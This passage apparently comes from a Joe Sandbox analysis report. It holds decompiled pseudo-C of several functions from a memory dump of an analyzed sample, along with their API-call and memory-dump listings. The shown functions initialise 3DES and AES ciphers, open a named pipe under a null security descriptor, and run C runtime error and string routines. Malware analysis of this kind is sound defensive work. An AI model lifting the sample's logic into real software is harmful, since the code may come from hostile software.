      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F626BA, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 90
    C-Code - Quality: 26%
    			E00F626BA() {
				char _v40;
				char _v108;
				intOrPtr _t10;
				void* _t18;
				void* _t23;
				void* _t24;
				WCHAR* _t25;

				_t23 =  *0xf6cd48(0xf6cef0, L"3DES", 0, 0);
				if(_t23 < 0) {
					L8:
					return _t23;
				}
				_t23 =  *0xf6cd4c( *0xf6cef0, L"ChainingMode", L"ChainingModeCBC", 0x20, 0);
				if(_t23 < 0) {
					goto L8;
				}
				_t23 =  *0xf6cd50( *0xf6cef0, L"ObjectLength", 0xf6cefc, 4,  &_v40, 0);
				if(_t23 < 0) {
					goto L8;
				}
				_t25 = L"kernel32";
				_t10 =  *(GetProcAddress(GetModuleHandleW(_t25), "LocalAlloc"))();
				 *0xf6cef8 = _t10;
				_t23 =  *0xf6cd48(0xf6ced0, L"AES", 0, 0, 0x40,  *0xf6cefc, _t24, _t18);
				if(_t23 >= 0) {
					_t23 =  *0xf6cd4c( *0xf6ced0, L"ChainingMode", L"ChainingModeCFB", 0x20, 0);
					if(_t23 >= 0) {
						_t23 =  *0xf6cd50( *0xf6ced0, L"ObjectLength", 0xf6cedc, 4,  &_v108, 0);
						if(_t23 >= 0) {
							_push( *0xf6cedc);
							_push(0x40);
							 *0xf6ced8 =  *(GetProcAddress(GetModuleHandleW(_t25), "LocalAlloc"))();
						}
					}
				}
				goto L8;
			}










    0x00f626d1
    0x00f626d5
    0x00f627cf
    0x00f627d3
    0x00f627d3
    0x00f626f4
    0x00f626f8
    0x00000000
    0x00000000
    0x00f6271c
    0x00f62720
    0x00000000
    0x00000000
    0x00f62734
    0x00f6274c
    0x00f6275c
    0x00f62767
    0x00f6276b
    0x00f62787
    0x00f6278b
    0x00f627ac
    0x00f627b0
    0x00f627b2
    0x00f627b8
    0x00f627c7
    0x00f627c7
    0x00f627b0
    0x00f6278b
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F62741
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F6274A
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F627C0
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F627C3
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61FEC, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 74
    C-Code - Quality: 69%
    			E00F61FEC(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v12;
				struct _SECURITY_DESCRIPTOR* _t11;
				void* _t19;
				void* _t21;
				signed int _t24;
				signed int _t25;

				asm("stosd");
				asm("stosd");
				_t21 = 3;
				asm("stosd");
				_t25 = _t24 | 0xffffffff;
				_v12.nLength = 0xc;
				_v12.bInheritHandle = 0;
				_t11 = HeapAlloc(GetProcessHeap(), 8, 0x14);
				_v12.lpSecurityDescriptor = _t11;
				if(_t11 != 0 && InitializeSecurityDescriptor(_t11, 1) != 0 && SetSecurityDescriptorDacl(_v12.lpSecurityDescriptor, 1, 0, 0) != 0) {
					while(1) {
						_t21 = _t21 - 1;
						_t25 = CreateFileW(_a4, 0xc0000000, 0,  &_v12, 3, 0, 0);
						if(_t25 != 0xffffffff) {
							break;
						}
						_t19 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "GetLastError"))();
						_push(0xbb8);
						if(_t19 == 0xe7) {
							if(WaitNamedPipeW(_a4, ??) != 0) {
								goto L8;
							}
						} else {
							Sleep();
							L8:
							if(_t21 != 0) {
								continue;
							}
						}
						break;
					}
				}
				return _t25;
			}









    0x00f61ff8
    0x00f61ff9
    0x00f61ffc
    0x00f61ffd
    0x00f62004
    0x00f62007
    0x00f6200f
    0x00f6201a
    0x00f62020
    0x00f62026
    0x00f62051
    0x00f62064
    0x00f6206b
    0x00f62070
    0x00000000
    0x00000000
    0x00f62089
    0x00f6208b
    0x00f62091
    0x00f620a7
    0x00000000
    0x00000000
    0x00f62093
    0x00f62093
    0x00f620a9
    0x00f620ab
    0x00000000
    0x00000000
    0x00f620ab
    0x00000000
    0x00f62091
    0x00f620ad
    0x00f620b6

    APIs
    • GetProcessHeap.KERNEL32 ref: 00F62013
    • HeapAlloc.KERNEL32(00000000), ref: 00F6201A
    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00F6202F
    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00F62041
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00F62065
    • GetModuleHandleW.KERNEL32(kernel32,GetLastError), ref: 00F6207C
    • GetProcAddress.KERNEL32(00000000), ref: 00F62083
    • Sleep.KERNEL32(00000BB8), ref: 00F62093
    • WaitNamedPipeW.KERNEL32(?,00000BB8), ref: 00F6209F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64FF7, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 148
    C-Code - Quality: 78%
    			E00F64FF7(void* __edx, void* _a4) {
				signed int _v8;
				struct HINSTANCE__* _v9;
				void _v508;
				long _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t23;
				short _t28;
				void* _t32;
				void* _t34;
				void* _t37;
				long _t38;
				void* _t39;
				struct HINSTANCE__* _t40;
				void* _t52;
				long _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				void* _t57;

				_t52 = __edx;
				_t18 =  *0xf6b940; // 0xbb40e64e
				_v8 = _t18 ^ _t55;
				_t54 = _a4;
				_t53 = E00F64FD1(_t54);
				_t40 = 0;
				_v512 = _t53;
				if(_t53 != 0) {
					if(E00F67578(3) == 1 || E00F67578(3) == 0 &&  *0xf6b000 == 1) {
						_t54 = GetStdHandle(0xfffffff4);
						if(_t54 != _t40 && _t54 != 0xffffffff) {
							_t23 = 0;
							while(1) {
								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
									break;
								}
								_t23 = _t23 + 1;
								if(_t23 < 0x1f4) {
									continue;
								}
								break;
							}
							_v9 = _t40;
							_t20 = WriteFile(_t54,  &_v508, E00F66C20( &_v508),  &_v512, _t40);
						}
					} else {
						if(_t54 != 0xfc) {
							_t53 = 0xf6c038;
							_t28 = E00F67515(0xf6c038, 0x314, L"Runtime Error!\n\nProgram: ");
							_t57 = _t56 + 0xc;
							if(_t28 != 0) {
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								goto L9;
							} else {
								_t54 = 0xf6c06a;
								 *0xf6c272 = _t28;
								_t38 = GetModuleFileNameW(_t40, 0xf6c06a, 0x104);
								_t40 = 0x2fb;
								if(_t38 == 0) {
									_t39 = E00F67515(0xf6c06a, 0x2fb, L"<program name unknown>");
									_t57 = _t57 + 0xc;
									if(_t39 != 0) {
										L8:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L9:
										E00F64BDF();
									}
								}
							}
							if(E00F674FA(_t54) + 1 > 0x3c) {
								_t40 = _t40 - (0xf6bff4 + E00F674FA(_t54) * 2 - _t54 >> 1);
								_t37 = E00F6742D(0xf6bff4 + E00F674FA(_t54) * 2, _t40, L"...", 3);
								_t57 = _t57 + 0x14;
								if(_t37 != 0) {
									goto L8;
								}
							}
							_t54 = 0x314;
							_t32 = E00F673B8(_t53, 0x314, L"\n\n");
							_t57 = _t57 + 0xc;
							if(_t32 != 0) {
								goto L8;
							}
							_t34 = E00F673B8(_t53, 0x314, _v512);
							_t57 = _t57 + 0xc;
							if(_t34 != 0) {
								goto L8;
							}
							_t20 = E00F6724C(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return E00F65F8E(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
			}

























    0x00f64ff7
    0x00f65002
    0x00f65009
    0x00f6500e
    0x00f65018
    0x00f6501a
    0x00f6501d
    0x00f65025
    0x00f65036
    0x00f6514b
    0x00f6514f
    0x00f65156
    0x00f65158
    0x00f6515b
    0x00f65166
    0x00000000
    0x00000000
    0x00f65168
    0x00f6516e
    0x00000000
    0x00000000
    0x00000000
    0x00f6516e
    0x00f6517f
    0x00f65191
    0x00f65191
    0x00f65055
    0x00f6505b
    0x00f6506b
    0x00f65071
    0x00f65076
    0x00f6507b
    0x00f65139
    0x00f6513a
    0x00f6513b
    0x00f6513c
    0x00f6513d
    0x00000000
    0x00f65081
    0x00f65086
    0x00f6508d
    0x00f65093
    0x00f65099
    0x00f650a0
    0x00f650a9
    0x00f650ae
    0x00f650b3
    0x00f650b5
    0x00f650b7
    0x00f650b8
    0x00f650b9
    0x00f650ba
    0x00f650bb
    0x00f650bc
    0x00f650bc
    0x00f650bc
    0x00f650b3
    0x00f650a0
    0x00f650cc
    0x00f650e8
    0x00f650ec
    0x00f650f1
    0x00f650f6
    0x00000000
    0x00000000
    0x00f650f6
    0x00f650fd
    0x00f65104
    0x00f65109
    0x00f6510e
    0x00000000
    0x00000000
    0x00f65118
    0x00f6511d
    0x00f65122
    0x00000000
    0x00000000
    0x00f6512f
    0x00f65134
    0x00f6505b
    0x00f65036
    0x00f651a5

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00F6C06A,00000104,00000001,00000000,00000000), ref: 00F65093
      • Part of subcall function 00F64BDF: GetCurrentProcess.KERNEL32(C0000417), ref: 00F64BF5
      • Part of subcall function 00F64BDF: TerminateProcess.KERNEL32(00000000), ref: 00F64BFC
    • _wcslen.LIBCMT ref: 00F650C2
    • _wcslen.LIBCMT ref: 00F650CF
      • Part of subcall function 00F6724C: LoadLibraryW.KERNEL32(USER32.DLL,00F6C038,00000314,00000000), ref: 00F67287
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00F672A3
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672B4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00F672C1
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672C4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00F672D1
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672D4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00F672E1
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672E4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00F672F5
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672F8
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(00000000,00F6C038,00000314,00000000), ref: 00F6731A
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32 ref: 00F67324
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(?,00F6C038,00000314,00000000), ref: 00F67363
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(?), ref: 00F6737D
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(00F6C038,00000314,00000000), ref: 00F67391
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,00000000), ref: 00F65145
    • _strlen.LIBCMT ref: 00F65182
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F65191
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61041, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80
    C-Code - Quality: 80%
    			E00F61041(void** __edi) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				void* __esi;
				void* _t15;
				signed int _t18;
				void* _t20;
				intOrPtr _t23;
				void* _t26;
				intOrPtr _t29;
				void* _t32;
				signed int _t35;
				void** _t40;
				WCHAR* _t43;

				_t40 = __edi;
				_v4 = _v4 & 0x00000000;
				_push(8);
				_push(0x40);
				_t43 = L"kernel32";
				_t15 =  *(GetProcAddress(GetModuleHandleW(_t43), "LocalAlloc"))();
				 *__edi = _t15;
				if(_t15 != 0) {
					_t35 = _v4;
					 *_t15 = _t35;
					_t18 = _t35;
					if(_t18 == 0) {
						_v12 = 1;
						goto L11;
					} else {
						_t20 = _t18 - 1;
						if(_t20 == 0) {
							L6:
							_push(4);
							_push(0x40);
							_t23 =  *(GetProcAddress(GetModuleHandleW(_t43), "LocalAlloc"))();
							 *((intOrPtr*)( *_t40 + 4)) = _t23;
							if(_t23 == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *_t40 + 4)))) = _v8;
								_v20 = 1;
							}
						} else {
							_t26 = _t20 - 1;
							if(_t26 == 0) {
								_push(4);
								_push(0x40);
								_t29 =  *(GetProcAddress(GetModuleHandleW(_t43), "LocalAlloc"))();
								 *((intOrPtr*)( *__edi + 4)) = _t29;
								if(_t29 == 0) {
									goto L12;
								} else {
									_push(_v8);
									_v20 = E00F61487( *((intOrPtr*)( *__edi + 4)));
									L11:
									if(_v12 == 0) {
										goto L12;
									}
								}
							} else {
								_t32 = _t26 - 1;
								if(_t32 == 0 || _t32 == 3) {
									goto L6;
								} else {
									L12:
									LocalFree( *_t40);
								}
							}
						}
					}
				}
				return _v12;
			}


















    0x00f61041
    0x00f61042
    0x00f6104f
    0x00f61051
    0x00f61058
    0x00f61069
    0x00f6106b
    0x00f6106f
    0x00f61075
    0x00f61079
    0x00f6107d
    0x00f61080
    0x00f610ee
    0x00000000
    0x00f61082
    0x00f61082
    0x00f61083
    0x00f61090
    0x00f61090
    0x00f61092
    0x00f6109f
    0x00f610a3
    0x00f610a8
    0x00000000
    0x00f610aa
    0x00f610b3
    0x00f610b5
    0x00f610b5
    0x00f61085
    0x00f61085
    0x00f61086
    0x00f610bf
    0x00f610c1
    0x00f610ce
    0x00f610d2
    0x00f610d7
    0x00000000
    0x00f610d9
    0x00f610db
    0x00f610e8
    0x00f610f6
    0x00f610fb
    0x00000000
    0x00000000
    0x00f610fb
    0x00f61088
    0x00f61088
    0x00f61089
    0x00000000
    0x00f610fd
    0x00f610fd
    0x00f610ff
    0x00f610ff
    0x00f61089
    0x00f61086
    0x00f61083
    0x00f61080
    0x00f6110d

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00000001,00000000,00000001,?,00F62C36,00000001,00000000), ref: 00F6105E
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F61067
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F6109A
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6109D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F610C9
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F610CC
      • Part of subcall function 00F61487: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00F6CD68,00F610E7,?,?,00F62C36,00000001,00000000), ref: 00F61498
      • Part of subcall function 00F61487: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6149F
      • Part of subcall function 00F61487: CreateFileMappingW.KERNEL32(C0000225,00000000,00000002,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614B7
      • Part of subcall function 00F61487: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614CE
    • LocalFree.KERNEL32(00F6CD68,?,00F62C36,00000001,00000000), ref: 00F610FF
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F65C3A, Relevance: 15.2, APIs: 10, Instructions: 190
    C-Code - Quality: 79%
    			E00F65C3A(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				int _t73;
				short* _t75;
				short* _t77;
				short* _t78;
				signed int _t81;
				void* _t83;
				int _t84;
				int _t86;
				signed int _t88;
				void* _t90;
				short* _t91;
				char* _t96;
				int _t99;
				signed int _t108;
				signed int _t109;
				int _t112;
				signed int _t113;
				signed int _t115;
				int _t116;

				_t67 =  *0xf6b940; // 0xbb40e64e
				_v8 = _t67 ^ _t115;
				_t109 = _a20;
				if(_t109 <= 0) {
					L8:
					_v12 = 0;
					if(_a32 == 0) {
						_a32 =  *((intOrPtr*)( *_a4 + 4));
					}
					_t114 = MultiByteToWideChar;
					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
					_v20 = _t112;
					if(_t112 != 0) {
						if(__eflags <= 0) {
							L21:
							_v16 = 0;
							L22:
							__eflags = _v16;
							if(_v16 == 0) {
								goto L11;
							}
							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
							__eflags = _t75;
							if(_t75 == 0) {
								L45:
								E00F65C1A(_v16);
								_t73 = _v12;
								goto L46;
							}
							_t114 = LCMapStringW;
							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
							_v12 = _t77;
							__eflags = _t77;
							if(_t77 == 0) {
								goto L45;
							}
							__eflags = _a12 & 0x00000400;
							if((_a12 & 0x00000400) == 0) {
								_t113 = _v12;
								__eflags = _t113;
								if(_t113 <= 0) {
									L37:
									_t112 = 0;
									__eflags = 0;
									L38:
									__eflags = _t112;
									if(_t112 != 0) {
										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
										__eflags = _t78;
										if(_t78 != 0) {
											_push(0);
											_push(0);
											__eflags = _a28;
											if(_a28 != 0) {
												_push(_a28);
												_push(_a24);
											} else {
												_push(0);
												_push(0);
											}
											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
										}
										E00F65C1A(_t112);
									}
									goto L45;
								}
								_t81 = 0xffffffe0;
								_t109 = _t81 % _t113;
								__eflags = _t81 / _t113 - 2;
								if(_t81 / _t113 < 2) {
									goto L37;
								}
								_t83 = _t113 + _t113 + 8;
								__eflags = _t83 - 0x400;
								if(_t83 > 0x400) {
									_t84 = E00F677DC(_t109, _t113, LCMapStringW, _t83);
									__eflags = _t84;
									if(_t84 != 0) {
										 *_t84 = 0xdddd;
										_t84 = _t84 + 8;
										__eflags = _t84;
									}
									_t112 = _t84;
									goto L38;
								}
								E00F67870(_t83);
								_t112 = _t116;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L45;
								}
								 *_t112 = 0xcccc;
								_t112 = _t112 + 8;
								goto L38;
							}
							_t86 = _a28;
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags = _v12 - _t86;
								if(_v12 <= _t86) {
									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
								}
							}
							goto L45;
						}
						_t88 = 0xffffffe0;
						_t109 = _t88 % _t112;
						__eflags = _t88 / _t112 - 2;
						if(_t88 / _t112 < 2) {
							goto L21;
						}
						_t24 = _t112 + 8; // 0x8
						_t90 = _t112 + _t24;
						__eflags = _t90 - 0x400;
						if(_t90 > 0x400) {
							_t91 = E00F677DC(_t109, _t112, MultiByteToWideChar, _t90);
							__eflags = _t91;
							if(_t91 == 0) {
								L20:
								_v16 = _t91;
								goto L22;
							}
							 *_t91 = 0xdddd;
							L19:
							_t91 =  &(_t91[4]);
							__eflags = _t91;
							goto L20;
						}
						E00F67870(_t90);
						_t91 = _t116;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L20;
						}
						 *_t91 = 0xcccc;
						goto L19;
					} else {
						L11:
						_t73 = 0;
						L46:
						return E00F65F8E(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
					}
				} else {
					_t96 = _a16;
					_t108 = _t109;
					while(1) {
						_t108 = _t108 - 1;
						if( *_t96 == 0) {
							break;
						}
						_t96 =  &(_t96[1]);
						if(_t108 != 0) {
							continue;
						} else {
							_t108 = _t108 | 0xffffffff;
							break;
						}
					}
					_t99 = _t109 - _t108 - 1;
					if(_t99 < _t109) {
						_t99 = _t99 + 1;
					}
					_a20 = _t99;
					goto L8;
				}
			}































    0x00f65c42
    0x00f65c49
    0x00f65c4c
    0x00f65c56
    0x00f65c77
    0x00f65c77
    0x00f65c7d
    0x00f65c87
    0x00f65c87
    0x00f65c8a
    0x00f65cad
    0x00f65caf
    0x00f65cb4
    0x00f65cbd
    0x00f65d02
    0x00f65d02
    0x00f65d05
    0x00f65d05
    0x00f65d08
    0x00000000
    0x00000000
    0x00f65d19
    0x00f65d1b
    0x00f65d1d
    0x00f65e03
    0x00f65e06
    0x00f65e0b
    0x00000000
    0x00f65e0e
    0x00f65d23
    0x00f65d35
    0x00f65d37
    0x00f65d3a
    0x00f65d3c
    0x00000000
    0x00000000
    0x00f65d47
    0x00f65d4a
    0x00f65d75
    0x00f65d78
    0x00f65d7a
    0x00f65dbe
    0x00f65dbe
    0x00f65dbe
    0x00f65dc0
    0x00f65dc0
    0x00f65dc2
    0x00f65dd4
    0x00f65dd6
    0x00f65dd8
    0x00f65dda
    0x00f65ddb
    0x00f65ddc
    0x00f65ddf
    0x00f65de5
    0x00f65de8
    0x00f65de1
    0x00f65de1
    0x00f65de2
    0x00f65de2
    0x00f65df9
    0x00f65df9
    0x00f65dfd
    0x00f65e02
    0x00000000
    0x00f65dc2
    0x00f65d80
    0x00f65d81
    0x00f65d83
    0x00f65d86
    0x00000000
    0x00000000
    0x00f65d88
    0x00f65d8c
    0x00f65d8e
    0x00f65da7
    0x00f65dad
    0x00f65daf
    0x00f65db1
    0x00f65db7
    0x00f65db7
    0x00f65db7
    0x00f65dba
    0x00000000
    0x00f65dba
    0x00f65d90
    0x00f65d95
    0x00f65d97
    0x00f65d99
    0x00000000
    0x00000000
    0x00f65d9b
    0x00f65da1
    0x00000000
    0x00f65da1
    0x00f65d4c
    0x00f65d4f
    0x00f65d51
    0x00f65d57
    0x00f65d5a
    0x00f65d6e
    0x00f65d6e
    0x00f65d5a
    0x00000000
    0x00f65d51
    0x00f65cc3
    0x00f65cc4
    0x00f65cc6
    0x00f65cc9
    0x00000000
    0x00000000
    0x00f65ccb
    0x00f65ccb
    0x00f65ccf
    0x00f65cd4
    0x00f65cea
    0x00f65cf0
    0x00f65cf2
    0x00f65cfd
    0x00f65cfd
    0x00000000
    0x00f65cfd
    0x00f65cf4
    0x00f65cfa
    0x00f65cfa
    0x00f65cfa
    0x00000000
    0x00f65cfa
    0x00f65cd6
    0x00f65cdb
    0x00f65cdd
    0x00f65cdf
    0x00000000
    0x00000000
    0x00f65ce1
    0x00000000
    0x00f65cb6
    0x00f65cb6
    0x00f65cb6
    0x00f65e0f
    0x00f65e20
    0x00f65e20
    0x00f65c58
    0x00f65c58
    0x00f65c5b
    0x00f65c5d
    0x00f65c5d
    0x00f65c60
    0x00000000
    0x00000000
    0x00f65c62
    0x00f65c65
    0x00000000
    0x00f65c67
    0x00f65c67
    0x00000000
    0x00f65c67
    0x00f65c65
    0x00f65c6e
    0x00f65c71
    0x00f65c73
    0x00f65c73
    0x00f65c74
    0x00000000
    0x00f65c74

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 00F65CAB
    • __alloca_probe_16.NTDLLP ref: 00F65CD6
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00F65D19
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00F65D35
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F65D6E
    • __alloca_probe_16.NTDLLP ref: 00F65D90
      • Part of subcall function 00F677DC: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000,?,00F660A2,00000018,00F69EB8,0000000C,00F66132), ref: 00F67821
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 00F65DD4
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00F65DF3
    • __freea.LIBCMT ref: 00F65DFD
    • __freea.LIBCMT ref: 00F65E06
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61487, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 49
    C-Code - Quality: 88%
    			E00F61487(void*** __esi) {
				void* _v4;
				void** _t7;
				void** _t10;
				void* _t13;
				void* _t15;
				long _t19;
				void*** _t20;

				_t20 = __esi;
				_push(8);
				_push(0x40);
				_t19 = 0;
				_t7 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
				 *__esi = _t7;
				if(_t7 != 0) {
					 *( *__esi) = CreateFileMappingW(_v4, 0, 2, 0, 0, 0);
					_t10 =  *__esi;
					if( *_t10 == 0) {
						L6:
						E00F61503( *_t20);
					} else {
